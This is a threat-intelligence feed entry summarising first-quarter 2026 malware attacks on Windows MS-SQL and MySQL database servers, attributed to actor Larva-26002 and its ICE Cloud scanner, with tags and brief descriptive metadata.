Q1 2026 Malware Statistics Report for Windows Database Servers
Essential information
- Published
- 14/04/2026 10:54
- Modified
- 14/04/2026 09:51
- Source / Author
- AlienVault
- Confidence
- 100/100
- Report type(s)
- threat-report
- Labels / Tags
- brute force clrshell coinminer credential stuffing database servers dictionary attack gh0strat ice cloud juicypotato loveminer ms-sql mykings mysql netcat scanner shadowforce
- Tags
- 2026-04-14 brute-force clrshell coinminer credential stuffing database servers dictionary attack gh0strat ice cloud juicypotato loveminer ms-sql mykings mysql netcat scanner shadowforce
- Related entities
- 5 indicators, 5 observables, 1 intrusion sets (apt), 18 techniques (mitre), 9 malware, 1 others
Description
During the first quarter of 2026, Windows-based MS-SQL and MySQL database servers experienced consistent malicious attacks with a temporary decrease in February before rising again in March. The primary threat actor, Larva-26002, leveraged various utilities including BCP, curl, bitsadmin, and PowerShell to deploy a Go-based scanner called ICE Cloud, which contained Turkish language strings and C&C-based scanning capabilities. This tool attempted MS-SQL authentication using predefined credentials. Attack methods primarily consisted of brute force attacks, dictionary attacks, and exploitation of unpatched systems with misconfigured accounts stemming from inadequate account management practices.